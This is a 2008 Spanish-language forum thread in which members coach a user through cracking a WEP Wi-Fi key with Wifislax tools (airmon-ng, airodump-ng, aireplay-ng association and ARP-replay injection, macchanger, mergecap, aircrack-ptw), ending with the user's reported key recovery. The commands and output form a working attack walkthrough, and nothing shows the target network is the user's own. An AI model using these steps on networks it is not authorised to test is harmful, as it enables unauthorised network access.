Autor Tema: VMware + Wifislax 3.1 + ataques (Leído 20033 veces)

meigallo99 · « **en:** 22-02-2008, 09:50 (Viernes) »

Hola
necesito un poquito mas de ayuda,no se como hacer la auditoria, ai van las preguntas:

Modo monitor
1- pongo "airmon-ng start rausb0" y miro cual es la red de la auditoria y en que canal esta
2- cierro esa shell y pongo "airmon-ng start rausb0 X " con el canal en vez de la X
y ya tengo en modo monitor, vale.

seguimos, para capturar:
4-pongo "airodump-ng -w datos -cX --bssid MAC objetivo rausb0", en la "X" pongo el canal y en "MAC objetivo"
pongo el BSSID en cuestion.

Para inyectar:
Como saber si hay un cliente conectado?
y si es asi, cual es el MAC cliente
Si no hay cliente conectado:
1- conseguir asociacion "aireplay-ng -1 30 -e ESSID -a MAC objetivo -h 00:11:22:33:44:55 rausb0, como saber
cuando se consigue la asociación?

2- inyectar despues de conseguir asociacion: "aireplay-ng -3 -x600 -b MAC objetivo -h 00:11:22:33:44:55 rausb0"
como veo si inyecta?, que es lo que se ve?, sube la opcion "packets"de la shell que tenemos en modo monitor?

como conseguir clave?? cuando pongo "aircrack-ptw archivo.cap." para conseguir clave que tengo
que poner en "archivo"?

Ya se que alomejor es mucho pedir pero seria magnifico si pudierais enviar alguna foto de alguna captura para poder guiarmos

tengo que pedir disculpas por anticipado por si alguna de las preguntas parecen ""tontas"" pero ai que darse de cuenta que no todos somos informaticos.

MUCHAS grazias a todos y en especial a drvalium, cuando pueda hacer la auditoria te aseguro que te hago un monumento en el medio de la plaza mayor, la mereces solo por tu paciencia.

un saludo.

ChimoC · « **Respuesta #1 en:** 22-02-2008, 11:53 (Viernes) »

Cita de: meigallo99 en 22-02-2008, 09:50 (Viernes)

Hola
necesito un poquito mas de ayuda,no se como hacer la auditoria, ai van las preguntas:

Modo monitor
1- pongo "airmon-ng start rausb0" y miro cual es la red de la auditoria y en que canal esta
2- cierro esa shell y pongo "airmon-ng start rausb0 X " con el canal en vez de la X
y ya tengo en modo monitor, vale.

seguimos, para capturar:
4-pongo "airodump-ng -w datos -cX --bssid MAC objetivo rausb0", en la "X" pongo el canal y en "MAC objetivo"
pongo el BSSID en cuestion.

Para inyectar:
Como saber si hay un cliente conectado? Te lo dice y lo ves en el airodump
y si es asi, cual es el MAC cliente Idem que antes
Si no hay cliente conectado:
1- conseguir asociacion "aireplay-ng -1 30 -e ESSID -a MAC objetivo -h 00:11:22:33:44:55 rausb0, como saber
cuando se consigue la asociación? Te sale un monigote de association succ... Y para poner esa MAC (11:22.....) antes debes haber cambiado tu mac con macchanger (por ejemplo)
2- inyectar despues de conseguir asociacion: "aireplay-ng -3 -x600 -b MAC objetivo -h 00:11:22:33:44:55 rausb0"
como veo si inyecta?, que es lo que se ve?, sube la opcion "packets"de la shell que tenemos en modo monitor? Te subirán los datas y verás que tambien te suben los arp (XXXX arp)

como conseguir clave?? cuando pongo "aircrack-ptw archivo.cap." para conseguir clave que tengo
que poner en "archivo"? Lo que has puesto detras del -w del airodump... en tu caso datos-01.cap

Ya se que alomejor es mucho pedir pero seria magnifico si pudierais enviar alguna foto de alguna captura para poder guiarmos Por favor... hay mucha gente que ha hecho manuales.... busca uno de AINZA... por ejemplo...

tengo que pedir disculpas por anticipado por si alguna de las preguntas parecen ""tontas"" pero ai que darse de cuenta que no todos somos informaticos. Yo tampoco lo soy... y muchos de los de aquí seguro que tampoco... pero dedicamos tiempo y meses o años..... es como todo... a base de leer, probar, paciencia y tenacidad.... se consigue

MUCHAS grazias a todos y en especial a drvalium, cuando pueda hacer la auditoria te aseguro que te hago un monumento en el medio de la plaza mayor, la mereces solo por tu paciencia. La verdad es que si que tiene mucha paciencia
un saludo.

Como ves te he dividido el post.... recuerda.. posts nuevos que nada tengan que ver con el post original...abrir un post para ello

Un saludo

ChimoC

drvalium · « **Respuesta #2 en:** 22-02-2008, 20:37 (Viernes) »

buenas

Citar

Para inyectar:
Como saber si hay un cliente conectado?

Si hay un cliente conectado lo notaras por que al haber trafico entre el router (punto de acceso) y el pc (cliente) los #data van subiendo.

Citar

y si es asi, cual es el MAC cliente

los clientes conectados son los que aparecen en la parte de abajo, en la columna station salen las MAC de los clientes.

Citar

cuando se consigue la asociación?

cuando veas esto

Citar

como veo si inyecta?, que es lo que se ve?

¿que es lo que se ve? aunque te lo contara no me creerias

, tu tranquilo,mira los numeritos y cuando empieces a inyectar ya lo notaras

bueno, con esto tendrias que ir haciendo, la verdad es que no te he dicho nada que no te hubiese dicho ChimoC en ru respuesta, pero ¡¡¡¡¡como me mola poner fotos!!!

Citar

ChimoC
antes debes haber cambiado tu mac con macchanger

yo no lo hago y sin embargo consigo asociarme, fíjate en las capturas

saludos

meigallo99 · « **Respuesta #3 en:** 28-02-2008, 17:57 (Jueves) »

hola:
mas problemillas.Haver cuando llego a la opcion de conseguir clave, pongo "aircrack-ptw datos-01.cap" y
me aparece esto:

wifislax ~ # aircrack-ptw datos-01.cap
Bienvenido a Aircrack PTW v 1.0.0 (Spanish Build 2)

Pagina oficial: http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
Traduccion y mejoras por: Stilo16v (http://www.seguridadwireless.net)

Buscando una nueva tabla
BSSID = **:*3:*9:**:*2:*D Keyindex=0
Estadisticas para BSSID **:*3:4*:**:*2:*D Keyindex=0 Paquetes=3

No se ha encontrado una clave, desea continuar con aircrack-ng [S,n]?:

si le digo que si me aparece:

Ejecutando aircrack-ng... (no funcionara si el fichero .cap esta dentro de /root)

Opening datos-01.cap
Read 296 packets.

# BSSID ESSID Encryption

1 00:0*:3*:**:**:*C ********82 No data - WEP or WPA
2 0*:**:49:*2:**:CD WL**_5* WEP (9 IVs)
3 0*:*9:*B:*2:0*:*6 ***O No data - WEP or WPA
4 **:*2:*7:*0:*F:*1 domo********3 No data - WEP or WPA
5 *0:A*:*5:*1:**:** A*****I No data - WEP or WPA
6 0*:*4:A*:**:6*:*8 C*** WEP (58 IVs)
7 *A:*8:*E:6*:**:*C W*****S None (0.0.0.0)
8 **:**:*B:*3:*A:** l******98 WEP (10 IVs)
9 0*:1*:2*:0*:1*:A* W****96 No data - WEP or WPA

Index number of target network ?

(evidentemente sin nigun asterisco, y con los correspondientes numeros y letras de los BSSID y los ESSID)
Y si me fijo tanto en el BSSID como en el ESSID no aparece al que estoy haciendo la auditoria, no esta en esa lista.
tengo 660000 paquetes inyectados, o eso creo. en la otra shell me aparece:

Saving ARP requests in replay_arp-0228-162522.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 748000 packets (got 509043 ARP requests), sent 760012 packets...(243pps)

un saludo y muchas grazias.

drvalium · « **Respuesta #4 en:** 01-03-2008, 00:33 (Sábado) »

Buenas

cada vez que haces una prueba si siempre pones el mismo nombre al archivo (por ejemplo datos), wifislax los acumula y autonumera en vez de sobrescribirlos.

Prueba a entrar en la carpeta Home desde el icono del escritorio busca el archivo "datos" con la numeración mas alta y arrástralo a la consola.

según el ejemplo de la captura quedaría así

Código: [Seleccionar]

aircrack-ptw /root/datos-08.cap

saludos

PD:creo que hay una forma de unir todos los .cap en un solo archivo, te lo miro

katmox · « **Respuesta #5 en:** 02-03-2008, 12:20 (Domingo) »

Cita de: drvalium en 01-03-2008, 00:33 (Sábado)

PD:creo que hay una forma de unir todos los .cap en un solo archivo, te lo miro

en el Aircrack-ng tienes una utilidad llamada Ivstools con la que puedes unir capturas .cap

aqui tienes la informacion:
http://www.wirelessdefence.org/Contents/Aircrack-ng_WinIvstools.htm

drvalium · « **Respuesta #6 en:** 02-03-2008, 18:57 (Domingo) »

buenas

Puedes unir los .cap con el comando mergecap, la cosa seria así:

Código: [Seleccionar]

mergecap archivo-01 archivo-02 archivo-03 -w resultado.cap
En referencia a las capturas anteriores quedaria así

después seria esto:

Código: [Seleccionar]

aircrack-ptw ' /root/todoslosdatos.cap'

Si te interesa profundizar existe este tema abierto:

Como unir cap??

saludos

meigallo99 · « **Respuesta #7 en:** 07-03-2008, 09:41 (Viernes) »

ola
vale y una vez que los e unido que tengo que poner

todoslodatos.cap en vez de datos-01.cap

cuando pueda ya lo pruebo y os comento que estoy muy liado y no puedo acer nada, tengo el ordenador aparcado

un saludo

drvalium · « **Respuesta #8 en:** 07-03-2008, 21:19 (Viernes) »

buenas

Cita de: meigallo99 en 07-03-2008, 09:41 (Viernes)

todoslodatos.cap en vez de datos-01.cap

correcto.

saludos

meigallo99 · « **Respuesta #9 en:** 18-03-2008, 12:46 (Martes) »

olaa
ok os comento:
217167 paquetes inyectados y vuala!!!! clave de 28 cifras a tomar por culo!! con perdon.
magnifico, me parece increible, 28 cifras y tardo en descifrarla como 45 minutos!!!!.
Dr.valium eres el mejor. muchas grazias por tu ayuda, qualquier cosa que querais solo teneis que preguntar, me seguire conectando al foro modo regular y todo lo que querais ya sabeis.
un saludo a todos y muchisimas grazias a Dr.valium.

drvalium · « **Respuesta #10 en:** 18-03-2008, 20:43 (Martes) »

buenas

felicitaciones por tu éxito.

Cita de: megaillo99

217167 paquetes inyectados y vuala!!!! clave de 28 cifras a tomar por culo!! con perdon

usando aircrack-ptw con 100.000 deberia bastar, en ocasiones con 50.000 ya es suficiente.

Cita de: megaillo99

me seguire conectando al foro modo regular

me alegra saberlo.

Cita de: megaillo99

MUCHISIMAS GRAZIAS A DR.VALIUM

De nada, aquí estamos para lo que necesites.

saludos

PD: por norma general escribir en mayúsculas significa que gritas a la gente, se que no es tu caso y que lo que querías era resaltar tus agradecimientos, para esos casos es mejor usar las negritas o cambiar el color de las fuentes, por favor si puedes edita el post y quita las mayúsculas

.

Noticias:

Autor Tema: VMware + Wifislax 3.1 + ataques (Leído 20033 veces)

meigallo99

VMware + Wifislax 3.1 + ataques

ChimoC

Re: VMware + Wifislax 3.1 + ataques

drvalium

Re: VMware + Wifislax 3.1 + ataques

meigallo99

Re: VMware + Wifislax 3.1 + ataques

drvalium

Re: VMware + Wifislax 3.1 + ataques

katmox

Re: VMware + Wifislax 3.1 + ataques

drvalium

Re: VMware + Wifislax 3.1 + ataques

meigallo99

Re: VMware + Wifislax 3.1 + ataques

drvalium

Re: VMware + Wifislax 3.1 + ataques

meigallo99

Re: VMware + Wifislax 3.1 + ataques

drvalium

Re: VMware + Wifislax 3.1 + ataques